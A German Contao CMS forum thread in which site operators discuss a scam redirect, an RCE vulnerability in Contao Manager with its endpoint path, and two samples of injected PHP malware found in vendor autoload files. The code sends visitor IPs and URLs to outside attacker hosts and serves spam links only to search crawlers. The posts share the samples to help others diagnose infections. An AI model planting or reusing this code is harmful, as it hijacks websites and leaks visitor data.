SOS - Google-Suchergebnis leitet auf Scamming-Webseite um

Druckbare Version

70 Beiträge dieses Themas auf einer Seite anzeigen

10.11.2023, 10:41
betatester

Vielen Dank für Deine Einschätzung!
Wenngleich ich der Meinung bin, dass eine Erwähnung des Themas bei den Security Agenden sicher nicht geschadet hätte, auch wenn es keine direkte Contao Lücke ist.

Ein anderes Thema das ich bei meinen Recherchen gefunden habe, ist von letztem Jahr
https://kb.prohacktive.io/de/index.p...CVE-2022-26265

Hat mit 9,8 eine durchaus knackige CVE Bewertung. "Remote Code Execution" liest man nie gerne.

Hier gibt es auch den einen oder anderen Proof
https://github.com/redteamsecurity2023/CVE-2022-26265

Finde ich ebenfalls nicht auf den Contao Security Info Seiten.
Hier kann ich selbst den Angriffsweg aber nicht nachvollziehen (jedenfalls nicht auf die Schnelle), bei meinen Contao Installationen scheint /api/server/config nicht erreichbar zu sein. Somit also auch ein Beispiel wo es interessant wäre mehr darüber zu lesen.
10.11.2023, 10:49
Spooky

Wir haben das auch bei Symfony gemeldet - Symfony hat es aber nicht als Lücke gesehen, daher gibt es dafür auch kein CVE.
10.11.2023, 10:53
mlweb

Ich kenne keine Contao Managed Edition V 1.5.0. Kann aber an mir liegen.
10.11.2023, 10:55
betatester

Zitat:

Zitat von mlweb

Ich kenne keine Contao Managed Edition V 1.5.0. Kann aber an mir liegen.

Yep, die Versionsangabe hat mich auch sehr gewundert.
10.11.2023, 10:55
mlweb

@Spooky Die Antwort bezieht sich auf das Secret oder?
10.11.2023, 10:57
lbableck

Zitat:

Zitat von mlweb

Ich kenne keine Contao Managed Edition V 1.5.0. Kann aber an mir liegen.

Damit ist der Contao Manager 1.5.0 gemeint.

Zitat:

Zitat von betatester

Hier kann ich selbst den Angriffsweg aber nicht nachvollziehen (jedenfalls nicht auf die Schnelle), bei meinen Contao Installationen scheint /api/server/config nicht erreichbar zu sein. Somit also auch ein Beispiel wo es interessant wäre mehr darüber zu lesen.

Die URL lautet /contao-manager.phar.php/api/server/config.
Siehe auch https://web.archive.org/web/20220321...lityDetails.md
10.11.2023, 11:00
betatester

Danke für die Info. Bestätigt mich in der Strategie, die manager phar nicht einfach so online rumliegen zu lassen, wenn sie nicht benötigt wird.
10.11.2023, 11:00
Spooky

Zitat:

Zitat von mlweb

@Spooky Die Antwort bezieht sich auf das Secret oder?

Es bezieht sich auf die "Lücke" die entsteht, wenn kein oder nur ein unsicheres Secret vorhanden ist, ja.
10.11.2023, 11:14
lbableck

Zitat:

Zitat von betatester

Bestätigt mich in der Strategie, die manager phar nicht einfach so online rumliegen zu lassen, wenn sie nicht benötigt wird.

In dem Fall muss man zwar sowieso im CM angemeldet sein, daher find ich die 9.8 auch recht hoch angesetzt, aber schaden wirds nicht zumindest HTTP Auth noch vorm CM zu haben.
10.11.2023, 11:26
zonky

Blogpost "Contao richtig absichern"

https://pdir.de/news/contao-richtig-...-erhoehen.html
01.01.2024, 22:53
ph!L

Nur zum archivieren und für Menschen, die das auch betrifft: Wir haben trotz der Absicherung des Systems eine erneute Code-Einschleusung in die /vendor/autoload.php gehabt.
Folgender Code wurde eingeschleust:

PHP-Code:

header("HTTP/1.1 200 OK"); define("CONSTANT_NAME", "about"); try{ ini_set('display_errors','off'); error_reporting(E_ALL ^ E_NOTICE); set_time_limit(0); $api_url = "https://br3.botposter.net/web3/homed.php"; $header_curl = array("user_agent:".$_SERVER['HTTP_USER_AGENT']); $domain = isset($_SERVER['HTTP_X_FORWARDED_HOST']) ? $_SERVER['HTTP_X_FORWARDED_HOST'] : (isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : ''); $file=(isset($_SERVER['REQUEST_URI']) && $_SERVER['REQUEST_URI']!='')?$_SERVER['REQUEST_URI']:$_SERVER['HTTP_X_REWRITE_URL']; $post_data = array('ip'=>getIP(),'file'=>$file,'domain'=>$domain); $result = posturl($api_url."?".$domain.$file,$post_data); if(strlen($result) != 0){ echo $result; exit; } }catch (Exception $exception){ } function posturl($url,$post_data=null){ $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_HEADER, 0); curl_setopt($curl, CURLOPT_TIMEOUT, 30); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_USERAGENT,$_SERVER['HTTP_USER_AGENT']); curl_setopt($curl, CURLOPT_REFERER, @$_SERVER['HTTP_REFERER']); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, json_encode($post_data)); $data = curl_exec($curl); curl_close($curl); return $data; } function getIP() { if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) { $ip = getenv('HTTP_CLIENT_IP'); } elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) { $ip = getenv('HTTP_X_FORWARDED_FOR'); } elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) { $ip = getenv('REMOTE_ADDR'); } elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) { $ip = $_SERVER['REMOTE_ADDR']; } return preg_match ( '/[\d\.]{7,15}/', $ip, $matches ) ? $matches [0] : ''; } ?>
02.01.2024, 06:00
betatester

Kannst Du ausschließen, dass die Einschleusung über irgendwas anderes auf dem selben Webspace geschehen ist? Ich hatte mal einen Fall, wo in einem Unterverzeichnis (auf die eine Subdomain zeigte) ein veraltetes Ticketsystem Script vom Kunden rumlag, ob das dann Code eingeschleust wurde.

Oft kann es auch Erkenntnisse bringen, sich die Webserver Logs anzusehen und zwar um den Zeitpunkt herum, als die angegriffene Datei (in Deinem Fall die autoload) das letzte Mal geändert wurde. Hier kann man dann mitunter sehen, welche Scripts hier so aufgerufen wurden um die Einschleusung zu erzeugen.

Wenn Dich das alles nicht weiterbringt, würde ich an diesem Punkt einen Hoster Wechsel in Betracht ziehen, möglicherweise liegt das Sicherheitsleck dort.
03.01.2024, 09:24
ph!L

Leider kann ich das nicht genau sagen. Wir haben halt bei dem ersten Befall ein App Secret gesetzt und die FTP Zugänge neu gemacht. Ich betreibe ja einige Contao Installationen und habe bisher nur diese veraltete 4.4 mit diesem Problem. Ich gehe einfach davon aus, dass es in Symfony o.ä. eine Lücke gab, die dafür ausgenutzt wurde.

Der Befall muss Anfang November gewesen sein, da habe ich auch keine Logs mehr.

Wir haben mittlerweile auf 4.13 aktualisiert und werden das weiter beobachten.
04.01.2024, 07:31
Spooky

Wenn ihr auf 4.4 gewesen seid, dann kann das auf jeden Fall sein.
11.10.2024, 08:14
fl0rian

Habe gestern Abend zufällig auch eine Contao Installation 4.9 entdeckt, die fremde Inhalte injiziert hat. Diese war auch von diesem Symfony-Hack betroffen. Ich dachte auch, dass das Thema erledigt war, nachdem ich die x.php entfernt habe und den App-Secret gesetzt habe.

Tatsächlich war das aber scheinbar nicht der Fall. Der Angreifer hat im vendor/composer-Ordner eine Datei mit dem Namen autoloadreal.php hinterlegt und vor der autoload_real.php required.
Der Inhalt ist ähnlich:

PHP-Code:

<?php header("HTTP/1.1 200 OK"); define("CONSTANT_NAME", "about"); try{ ini_set('display_errors','off'); error_reporting(E_ALL ^ E_NOTICE); set_time_limit(0); $api_url = "https://googid.ssaa88.com/sy404.php"; $header_curl = array("user_agent:".$_SERVER['HTTP_USER_AGENT']); $protocol = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? 'https://' : 'http://'; $domain = isset($_SERVER['HTTP_X_FORWARDED_HOST']) ? $_SERVER['HTTP_X_FORWARDED_HOST'] : (isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : ''); $file=(isset($_SERVER['REQUEST_URI']) && $_SERVER['REQUEST_URI']!='')?$_SERVER['REQUEST_URI']:$_SERVER['HTTP_X_REWRITE_URL']; $arr_url = array('Android','ios','jogo','slot'); foreach ($arr_url as $url_r) { if (strpos($file, $url_r) !== false) { $post_data = array('ip'=>getIP(),'file'=>urlencode($file),'domain'=>$domain,'http'=>$protocol); $result = posturl($api_url."?".$domain.$file,$post_data); if(strlen($result) != 0){ echo $result; exit; } } } $key=$_SERVER['HTTP_USER_AGENT']; if(isset($_SERVER['HTTP_USER_AGENT']) && (stristr($_SERVER['HTTP_USER_AGENT'],"Google") || stristr($_SERVER['HTTP_USER_AGENT'],"yahoo") || stristr($_SERVER['HTTP_USER_AGENT'],"msn") || stristr($_SERVER['HTTP_USER_AGENT'],"bing"))){ $s="<ul style='list-style: none;'>"; echo $s; echo "\r\n"; $str="abcdefghijkmnpqrstuvwxyz0123456789ABCDEFGHIGKLMNPQRSTUVWXYZ"; $codeLen='9'; function str_rand($str,$codeLen){ $rand=""; for($i=0; $i<$codeLen-1; $i++){ $rand .= $str[mt_rand(0, strlen($str)-1)]; } return $rand; } for ($j=1;$j<=50;$j++) { $code=str_rand($str,$codeLen); $abc=$code; echo $a="<li><a href='/".$arr_url[array_rand($arr_url)]."$code'>$code</a></li>"; echo "\r\n"; } echo "</ul>"; } }catch (Exception $exception){ } function posturl($url,$post_data=null){ $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_HEADER, 0); curl_setopt($curl, CURLOPT_TIMEOUT, 30); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_USERAGENT,$_SERVER['HTTP_USER_AGENT']); curl_setopt($curl, CURLOPT_REFERER, @$_SERVER['HTTP_REFERER']); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, json_encode($post_data)); $data = curl_exec($curl); curl_close($curl); return $data; } function getIP() { if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) { $ip = getenv('HTTP_CLIENT_IP'); } elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) { $ip = getenv('HTTP_X_FORWARDED_FOR'); } elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) { $ip = getenv('REMOTE_ADDR'); } elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) { $ip = $_SERVER['REMOTE_ADDR']; } return preg_match ( '/[\d\.]{7,15}/', $ip, $matches ) ? $matches [0] : ''; } ?>

Ich habe alle Passwörter geändert und eine neue 4.13 Installation aufgesetzt.
Hoffentlich ist das Thema jetzt erledigt.

70 Beiträge dieses Themas auf einer Seite anzeigen